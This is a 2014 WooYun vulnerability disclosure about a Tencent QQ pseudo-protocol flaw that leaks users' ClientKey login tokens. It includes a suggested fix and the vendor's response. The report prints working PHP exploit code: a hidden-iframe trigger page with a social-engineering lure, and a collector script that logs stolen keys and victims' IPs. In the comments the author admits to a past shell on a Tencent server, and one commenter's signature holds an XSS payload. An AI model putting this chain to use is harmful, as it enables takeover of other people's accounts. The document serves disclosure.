当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054204

漏洞标题:腾讯QQ某控件设计缺陷导致可远程登录任意QQ账号(已证明QQ空间、相册、微博、邮箱可登陆)

相关厂商:腾讯

漏洞作者: 猪猪侠

提交时间:2014-03-21 14:10

修复时间:2014-05-05 14:10

公开时间:2014-05-05 14:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-21: 细节已通知厂商并且等待厂商处理中
2014-03-24: 厂商已经确认,细节仅向厂商公开
2014-04-03: 细节向核心白帽子及相关领域专家公开
2014-04-13: 细节向普通白帽子公开
2014-04-23: 细节向实习白帽子公开
2014-05-05: 细节向公众公开

简要描述:

腾讯QQ客户端某默认安装空间存在严重安全缺陷,黑客可远程获取任意好友的ClientKEY;
结合另外一个漏洞,即可绕过腾讯单点登陆系统的IP访问限制,登陆好友的QQ空间(围观QQ相册你懂的!)、QQ邮箱、QQ微博等QQ全线业务系统。

详细说明:

#详细的过程视频演示(更易懂)
http://wydrops-wordpress.stor.sinaapp.com/uploads/2014/05/qq.wmv


#1 测试环境
操作系统:Windows8 X64 最新版本补丁
QQ客户端:http://im.qq.com 下载的最新版 V 5.2 客户端程序 (2014年3月21日)

install.png


#2 问题描述
腾讯QQ客户端在安装时,会自动启用并在操作系统内注册多个自身产品控件,同时注册伪协议tencent:// 供自身产品调用。
#3 问题细节
腾讯QQ聊天窗口客户端有一个音乐分享功能,可供用户与用户之间进行音乐分享,由于本功能采用伪协议调用miniplayer(QQ空间音乐播放器)中的某个功能来播放音乐,其中mdlurl参数URL未做安全校验,导致直接将客户端的ClientKey附加为参数提交。
我们只需要构造特定的mdlurl,制定到自己的服务器,就能成功截取到好友的ClientKEY了
friend.php

<?php
$uinqq = $_GET['qq'];
$request_url = "tencent://miniplayer/?cmd=3&fuin=0&frienduin=" . $uinqq . "&action='accept'&mdlurl='http://bbs.m.qq.com/libs/qqmusic.php?songcount=1&songidlist=0&version=207&cmd=3&songnamelist=fuzz&singernamelist=success&songurllist=http%3A%2F%2Fstreamrdt.music.qq.com%2F4887.e3a65320e960cdf1b15d303b11495222%2F0%2Fa.mp3'&Exe=QQ";
$qzone_url = "http://user.qzone.qq.com/?" . $uinqq;
echo '<html><meta http-equiv="refresh" content="2;url=' . $qzone_url . '">';
echo "<iframe src=\"" . $request_url . "\" height=0px width=0px></iframe></html>";
?>

漏洞证明:

#4 实战利用

腾讯手机客户端推广计划,帮助好友加速升级!
http://bbs.m.qq.com/friend.php?qq=63200
!这个漏洞不受域名或者地域的限制,可以在任意页面引用带有伪协议的链接,就能获取到好友QQ的ClinetKEY
http://www.wooyun.org/hello?qq=63200
帮忙点一下呗?


send.jpg


#5 好友互动
当QQ好友点击那个链接后,我们即可接收到他的ClientKEY

.jpg


#6 成功获取到ClientKEY
qqmusic.php

<?php
$qquin = $_GET['uin'];
$clientkey = $_GET['key'];
$raw_data = 'UIN: ' . $qquin . '  KEY:  <a href="http://clubclient.qq.com/clubclient_goto.php?uin=' . $qquin . '&key=' . $clientkey . '&sendclick=1&qptag=1&statid=10001903&gotourl=http://qzone.qq.com&tipsid=52684" target="_blank">' . $clientkey . '</a> ' . date('Y,m,d H:i:s'). '  :  ' . $_SERVER["REMOTE_ADDR"] . "<br>";
$fp = @fopen('../fuzzlog.html','a+');
@fwrite($fp, "$raw_data");
@fclose($fp);  
?>


fuzz.jpg


# QQ相册,QQ空间,呵呵

qq相册.jpg

修复方案:

# 严格校验传递ClientKEY的URL是否为自身服务器

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-03-24 11:14

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-03-21 14:11 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    前排占位~

  2. 2014-03-21 14:11 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    给你个棒棒糖,告诉我细节吧~

  3. 2014-03-21 14:13 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    目测要火,前三占位。

  4. 2014-03-21 14:14 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)

    @猪猪侠 什么时候成功的进一回内网呀...好期待呀

  5. 2014-03-21 14:14 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @摸了你 马上,第三发就可以见到了。

  6. 2014-03-21 14:16 | Wangl ( 实习白帽子 | Rank:33 漏洞数:4 | 新浪支付,值得拥有)

    @char 游族大牛,你们公司的SHELL可好?

  7. 2014-03-21 14:27 | 小土豆 ( 普通白帽子 | Rank:129 漏洞数:23 )

    要火的节奏,求细节~

  8. 2014-03-21 14:32 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    求进内网

  9. 2014-03-21 14:37 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @摸了你 @孤独雪狼 求成功的进内网

  10. 2014-03-21 14:38 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    求内网的

  11. 2014-03-21 14:50 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    给你个棒棒糖,告诉我细节可以么!

  12. 2014-03-21 14:57 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    给你个棒棒糖,告诉我细节可以么!

  13. 2014-03-21 14:59 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    流弊

  14. 2014-03-21 15:07 | 裙下的秘密 ( 实习白帽子 | Rank:83 漏洞数:9 | )

    围观

  15. 2014-03-21 15:07 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    好屌

  16. 2014-03-21 15:09 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    mark,好屌

  17. 2014-03-21 15:10 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    终于来了,登陆任意QQ用户漏洞

  18. 2014-03-21 15:13 | 龙臣 ( 路人 | Rank:14 漏洞数:5 | 人生就是一个缓慢被骗的过程。)

    想看看马叔叔的相册啊

  19. 2014-03-21 15:32 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    火钳刘明

  20. 2014-03-21 15:42 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    好屌,火钳刘明

  21. 2014-03-21 15:52 | blackexp ( 实习白帽子 | Rank:36 漏洞数:13 | 一点一点的渗透到...)

    太屌了吧!

  22. 2014-03-21 15:56 | doosit ( 路人 | Rank:18 漏洞数:4 | 木有介绍。)

    好屌的说

  23. 2014-03-21 16:16 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    mark

  24. 2014-03-21 16:18 | 萧然 ( 路人 | Rank:0 漏洞数:2 | 喜欢一切美丽的东西!)

    mark

  25. 2014-03-21 16:21 | 木马游民 ( 路人 | Rank:17 漏洞数:8 | I love LSD!)

    你这么屌我都不知道

  26. 2014-03-21 16:23 | 脚本菜菜 ( 路人 | Rank:10 漏洞数:4 | 我只是混个邀请码。)

    mark

  27. 2014-03-21 16:35 | 飞扬风 ( 普通白帽子 | Rank:512 漏洞数:125 | 追求安全,热爱技术)

    果断要火了

  28. 2014-03-21 17:14 | admin1993 ( 普通白帽子 | Rank:110 漏洞数:39 | 0101001010010100101001010010100101001010...)

    mark

  29. 2014-03-21 17:58 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    任意这个屌.....有前提吗?还是直接获取。。 碉堡!

  30. 2014-03-21 17:58 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    @猪猪侠

  31. 2014-03-21 18:03 | Coffee ( 普通白帽子 | Rank:144 漏洞数:15 | Corie, a student of RDFZ.)

    碉堡了!中排占位。忽略 or rank5 or rank20?

  32. 2014-03-21 18:07 | 小怿 ( 路人 | Rank:29 漏洞数:6 | )

    @M4sk 同问,另外我想问,TM的QQ有这个洞吗?

  33. 2014-03-21 18:31 | ‫‌ ( 实习白帽子 | Rank:76 漏洞数:14 )

    猪哥V5

  34. 2014-03-21 19:21 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    @小怿 。。。。猪哥V5

  35. 2014-03-21 22:21 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    35楼也不算太迟吧。。

  36. 2014-03-21 22:26 | 炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)

    @Wangl 求@char公司内网shell

  37. 2014-03-21 22:55 | 高斯 ( 路人 | Rank:16 漏洞数:4 )

    绕过SSO?怎么搞的?

  38. 2014-03-22 07:59 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    以前发过类似的审核都不通过

  39. 2014-03-22 09:24 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  40. 2014-03-22 10:10 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    刘明

  41. 2014-03-22 13:04 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    够淫荡

  42. 2014-03-22 19:11 | 路人5 ( 路人 | Rank:6 漏洞数:5 | 你们别再问我是谁,你们可以叫我神奇的路人...)

    mark

  43. 2014-03-22 23:17 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

    够NB

  44. 2014-03-23 14:01 | 核攻击 ( 实习白帽子 | Rank:35 漏洞数:7 | 统治全球,奴役全人类!毁灭任何胆敢阻拦的...)

    各种mark

  45. 2014-03-23 17:07 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    坐等内网漫游!

  46. 2014-03-23 17:28 | xss_art ( 路人 | Rank:11 漏洞数:3 | 只会弹框框的跨站师。。。。)

    想知道怎么绕过ip访问控制。。。。关注。。。。

  47. 2014-03-24 09:45 | Master ( 路人 | Rank:29 漏洞数:10 )

    吊。。。。

  48. 2014-03-24 10:28 | Docee ( 路人 | Rank:10 漏洞数:3 | 屌丝)

    霸气。。。已Mark.

  49. 2014-03-24 10:51 | Draycen ( 路人 | Rank:0 漏洞数:1 )

    吊。。。。

  50. 2014-03-24 22:38 | tSt ( 路人 | Rank:27 漏洞数:7 | 在开发里运维最强,运维里网络最强,网络里...)

    Mark

  51. 2014-04-04 02:02 | 木马游民 ( 路人 | Rank:17 漏洞数:8 | I love LSD!)

    大神。

  52. 2014-04-18 19:47 | flying ( 路人 | Rank:4 漏洞数:2 | 呵呵)

    期待进次内网

  53. 2014-04-18 20:24 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接 建站、仿站、维护、反黑客、代码审计...)

    @flying 比起进内网,这个漏洞更吸引我

  54. 2014-04-23 12:49 | winsyk ( 普通白帽子 | Rank:108 漏洞数:16 | 越长大越孤单)

    赞。

  55. 2014-04-23 13:45 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    NB!!

  56. 2014-04-23 15:48 | Coffee ( 普通白帽子 | Rank:144 漏洞数:15 | Corie, a student of RDFZ.)

    这是已shell了bbs.m.qq.com?

  57. 2014-04-24 21:08 | Knight ( 实习白帽子 | Rank:38 漏洞数:10 | 刚刚上洗手间,看到一个玉树临风的少年,气...)

    测试用的php文件部署在腾讯服务器上?

  58. 2014-04-25 13:42 | Annabelle ( 实习白帽子 | Rank:46 漏洞数:15 | .)

    貌似已经shell了的样子

  59. 2014-04-25 15:21 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @Coffee @Annabelle @Knight 以前shell过,同时这个漏洞不受域名或者地域的限制,可以在任意页面引用带有伪协议的链接,就能获取到好友QQ的ClinetKEY。

  60. 2014-04-25 16:25 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @233 啥时候发的?

  61. 2014-05-05 22:58 | Ares ( 路人 | Rank:29 漏洞数:8 | 来自幼儿园大班)

    V5